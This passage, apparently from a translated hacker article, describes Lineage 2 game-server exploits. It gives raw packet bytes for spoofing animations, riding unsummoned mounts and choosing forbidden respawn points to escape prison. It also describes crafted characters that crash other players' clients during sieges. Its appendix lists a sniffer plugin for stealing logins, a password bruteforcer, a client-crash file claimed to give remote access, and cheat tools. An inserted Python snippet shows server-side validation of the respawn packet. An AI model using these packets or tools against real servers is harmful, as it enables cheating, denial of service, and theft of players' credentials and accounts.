What a SocialAction is, I think, needs no explanation. It turned out that besides laughter, greetings, victory and the rest, the animation at lvl up is the same SocialAction. And, as you know, the request to perform a SocialAction is sent by the client, that is, we ourselves can give ourselves a lvlup at any moment =) Only the animation, of course.

Here is the format of a SocialAction packet:

Code:

1b // packet type (SocialAction)
0f 00 00 00 // action number (0f - lvlup)

 

14. The bug with Ride (0x6a)

 

The "Ride" request is sent by the client when it wants to mount a strider or wyvern.

Format:

Code:

6a // packet type
00 00 00 00 // 0/1 dismount/mount
00 00 00 00 // pet number: 1 - strider, 2 - wyvern

 

 

When you have summoned a strider and send the "Ride" request, the strider actually disappears (that is, it leaves the game and loses its OID; that is exactly why, when you dismount, it vanishes), and you sit down not on your particular strider but on a certain standard strider :) I put that a little clumsily, but never mind. It turned out that on some La2 servers there is no check of whether you summoned a strider at all before sitting on it. That is, all of a sudden, having sent the packet:

6a 01 00 00 00 01 00 00 00

you will sit on a strider even though you did not summon it. And even if you do not have one. In the same way you can sit on a wyvern. This bug, like the jokes with SocialAction, was found by a person under the nickname Maddaemon. Thanks to him.

 

15. Throwing chars out of the game

 

I found this bug by accident while studying those same mutants. One question was why, when at character creation you specify a nonexistent race (a number greater than 4), a char with a human model is always created. Moreover, this human cannot learn skills at the human NPCs, that is, nothing but its model connects it with people. And so, it turned out that _only_ C1/C3 clients perceive such chars as humans. A C4 client simply does not find a model for such a char and crashes with an error. That is, as soon as such a char gets into the visibility range of a la2 C4 client, the client crashes. By visibility range I mean not what you see on the screen but roughly the range of the "/target" command. So, for example, by placing such a character near a castle for the duration of a siege, the attackers will have no chance, since capturing a castle with bots is extremely problematic and their clients simply cannot enter the game. I tested this on three large domestic C4 servers (not l2j); it worked everywhere. By the way, such chars can be used to check characters for bots :) If it has not crashed, it is a bot. But that is a method for GM-sadists. http://m00.void.ru/nuke.rar - a video recording from one of the Russian C4 servers. It shows what effect such chars have on other players.

 

16. The bug with RequestRestartPoint (revival and escape from prison)

 

This bug was found by our compatriot sshd from the underground forum www.allcheats.ru. When you die, a window appears with a choice of where you would like to respawn. Under normal conditions there is only one button: "return to the nearest village".

After pressing it, the game sends the packet:

Code:

 

6d // packet type (RequestRestartPoint)

00 00 00 00 // the argument that actually tells the server where to return us

 

 

The bug is that it is the client that tells the server where to return the char after death. That is, not the client, but we.

 

La2 C3/C4 servers support the following argument values (return location):

0 - to town (to the city)

1 - hide PK (if you are a PK, returns you to the PK city or to the vicinity of the city where you were killed)

2 - to castle

3 - to siege HQ (to the flag during a siege)

4 - fixed, festival (during the Festival of Darkness, revives you on the spot).

 

Thus, by sending "04 00 00 00" instead of "00 00 00 00", our char revives at the place where it was actually killed. In this connection I had an idea of how a character could get out of prison. For this the char sitting in prison must be in a clan. The clan registers for a siege and plants a flag, and the char in prison must then be killed somehow. On antaras.ru, for example, this is not hard: around the prison there are aggressive mobs that attack through the wall. Then you simply send a RequestRestartPoint packet with the argument "03 00 00 00" and the char appears (should appear :)) alive at the flag.
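The root cause the author points at is that the server trusts the client's argument. As an added example (not from the article or from any server project), here is how a server-side handler can decode the 5-byte packet shown above and decide the respawn target from its own record of the player's state; the Player fields and the fall-back-to-town policy are this example's assumptions.

```python
from dataclasses import dataclass
import struct

# Restart-point codes exactly as listed in the article (RequestRestartPoint, 0x6d).
TO_TOWN, HIDE_PK, TO_CASTLE, TO_SIEGE_HQ, FIXED_FESTIVAL = range(5)
RESTART_POINT_OPCODE = 0x6D


@dataclass
class Player:
    """Server-side state the handler must trust instead of the client's argument.
    Field names are this example's own assumptions, not any project's API."""
    dead: bool
    is_pk: bool = False
    clan_owns_castle: bool = False
    clan_has_siege_hq: bool = False
    in_festival: bool = False


def parse_restart_point(packet: bytes) -> int:
    """Decode opcode byte + 4-byte little-endian argument; reject anything else."""
    if len(packet) != 5 or packet[0] != RESTART_POINT_OPCODE:
        raise ValueError("malformed RequestRestartPoint packet")
    return struct.unpack_from("<I", packet, 1)[0]


def allowed_restart_points(p: Player) -> set:
    """Respawn targets this player is entitled to right now, per server state."""
    allowed = {TO_TOWN}                      # the only option a stock client offers
    if p.is_pk:
        allowed.add(HIDE_PK)
    if p.clan_owns_castle:
        allowed.add(TO_CASTLE)
    if p.clan_has_siege_hq:
        allowed.add(TO_SIEGE_HQ)
    if p.in_festival:
        allowed.add(FIXED_FESTIVAL)
    return allowed


def handle_restart_point(p: Player, packet: bytes):
    """Return the respawn target the server will actually use, or None to drop
    the packet. The client's choice is honoured only when server state confirms
    the entitlement; otherwise fall back to town (a mismatch worth logging,
    since an unmodified client never sends it)."""
    if not p.dead:
        return None                          # a live player has nothing to respawn
    requested = parse_restart_point(packet)
    return requested if requested in allowed_restart_points(p) else TO_TOWN
```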

 

 

17. Undressing someone else's character without knowing either the login or the password - is that really possible?

 

Yes, unfortunately it is. I decided to remove this paragraph from the article, as it is a very serious hole in lineage2 that will still make quite a bit of noise. I do not want it on my conscience :) I will only say that there is a way to log in as random characters (that is, we cannot choose the specific character; the server does that). So far it has been tested only on the well-known server www.l2extreme.com, but I am sure it works on others too. So do not be surprised if your char with a password like "6IlZk9qR[!]" suddenly gets undressed.

 

18. Result

 

I have described a sufficient number of bugs. Unfortunately, by the time this article was published most of them were no longer relevant. What is relevant now or currently in development will probably be posted later on the forum la2brute.5bb.ru.

 

V. Bugs of the new generation

 

[cut out] I can only say that my new in-game bot LA2Monster will use them.

 

 

VI. A few words about C4

 

In general, C4 still cannot achieve stability. More precisely, there is a certain fork in how authorization is implemented. L2J C4 servers began to encrypt the authorization packet with RSA (as does the official server from NCSoft). Moreover, a private/public key pair is generated for each connection. In the first packet the server sends the client a 1024-bit public key, with which the client encrypts the login/password packet _on top of_ blowfish. This approach guarantees that nobody from the outside can obtain a client's login and password. Although, recalling the breaking of RC5-64, recovering a 128-byte key does not seem so unattainable. It should be noted that generating an RSA key pair is a fairly labour-intensive job. On my machine, generating a key pair with the openssl libraries took ~1.5-2 seconds, which for a server with, say, 1000 players online is an unaffordable luxury. Then again, according to NCSoft's design the login server should be a separate machine from the game server, but as I already wrote above, this is not always the case here in Russia. As for C1Off servers converted to C4, RSA is not used in them, although the handling of the internal identifiers used for authorization on the game server has changed. Thus the same C4 client is used both for l2j and for C1Off-C4.

 

VII. An epilogue.

 

Of course, this article cannot serve as an RFC for lineage: naturally, I skipped some points because they were not important or because I did not fully understand them myself. Anyhow, I believe I have given you plenty of food for thought. If you disagree with something or know (think you know :D) something I do not, write to d4rk@securitylab.ru, or send a PM on www.allcheats.ru to the nick "nop". I will be glad to talk.

 

VIII. References.

 

http://72.14.203.104/search?q=cache:Dt3Jo9GNJcJ:gamehaqs.com/forums/index.php%3Fshowtopic%3D5041+blowfish+lineage2*hl=ru*gl=ru*ct=clnk*cd=1 - Google cache of a forum thread discussing lineage client-server interaction. Judging by the posts, people stubbornly refuse to look at the l2j source code and try to find a way to authenticate on a server by trial and error.

http://forum.ragezone.com/server-help-extra/lin1-server-emulator-incomplete-cant-even-login-26438.html - the same.

http://allcheats.ru/forums/showthread.php?t=1844 - the same, only our Russian one. Unlike the Americans, they have got a lot further.

http://cheaters.net.ua/forum/index.php?s=083fef4f61997fc4be2ad3b0a98ba8a2*showtopic=254*pid=2254*st=0 and *entry2254 - F4llen's article about fake enchant and about random types (mentioned in this article in the section on enchanting).

http://www.javable.com/columns/crypto/algorythms/01/ - an excellent section about blowfish.

http://arbuz.uz/z_pihns.html - an interesting article about computing the number 3.14 from probability theory. Just for broadening one's horizons.

http://www.securitylab.ru/analytics/216301.php - my previous article on a similar subject. It is simpler thanks to the intuitively clear HalfLife protocol; I recommend that beginners start with it.

http://la2brute.5bb.ru - the commercial project.

http://m00.void.ru/nuke.rar - video recording, the appendix to paragraph 13 (Throwing chars out of the game).

http://la2brute.5bb.ru/viewtopic.php?id=52 - shows how to learn skills of any level on projects and to mix professions on l2j using LA2Fun.

http://la2brute.5bb.ru/viewtopic.php?id=53 - shows how to create mutants (using an immortal one as an example) on projects using LA2Fun.

 

IX. Appendices to the article.

 

The appendix to the article is available at: m00.blackhat.ru/la2shit.rar

Contents:

game-serv-encryption.txt - source code for the encryption of packets by the game server (posted by sauron on allcheats.ru).

grabber.c - an old example of fetching nicknames from a site, using www.antaras.ru as the example. By the way, antaras.ru introduced cookies long ago, so this example no longer works on it. This code was mentioned in the section on password guessing.

ID.rar - the list of items and their corresponding IDs for la2brute_1.1.

OLD.rar - the old test version of la2brute. It was written in February-March of this year. It hangs and crashes, so consider it a PoC =)

la2reklamer.rar - a program for mass sending of messages. It fetches the nicknames of the players who are online by itself and, within a minute, personally writes a private message to each of them.

raid.jpg - an example of how immortal mutants can be used =) author Hint

screenshot1.jpg - a screenshot of the auth-packet generator

screenshot2.jpg - a screenshot of my sniffit patch and the password bruteforce against La2 servers working together.

shot1.JPG, shot2.JPG, shot3.JPG - screenshots of mutants created with la2fun

sniff.exe - eh, I am tearing this from my heart.. a sniffer that intercepts and decrypts incoming/outgoing la2 traffic, both login-server and game-server. It is tuned to my network interface, so to use it you will have to dig around in the binary =)

mass.nuke.avi - a recording of how hundreds of people drop from a server because of my char.

la2-example.c - an example of constructing a RequestAuthLogin packet

Sniffit.LA2C3.plug.rar - a plug-in for sniffit that allows intercepting other people's RequestAuthLogin packets and pulling the login/password out of them

l2.crash.ini - an encrypted settings file for the L2C3 client which crashes it. On successful exploitation it may allow full access to the computer on which this l2.ini was used.

la2fun_1.2.demo.rar - a cut-down LA2Fun 1.2. It can create mutants, immortal chars, chars without a head, and learn skills of any level. And LA2Brute 1.5 (C3/C4). I decided not to release the latest versions of LA2Fun out of respect for those who paid money for them.. I also wanted to post the linux version of la2brute, but somehow could not find it :\

 

Special thanks to h0snp, sshd and hint =) And also greetings to Silence/EF ;) and to the channel *m00 on irc.blackhat.ru

 

© darkgrey / m00.blackhat.ru

 

 

All credit for the translation goes to CAHEK

 

Source: http://www.clanlq.com/forum/viewtopic.php?p=2209
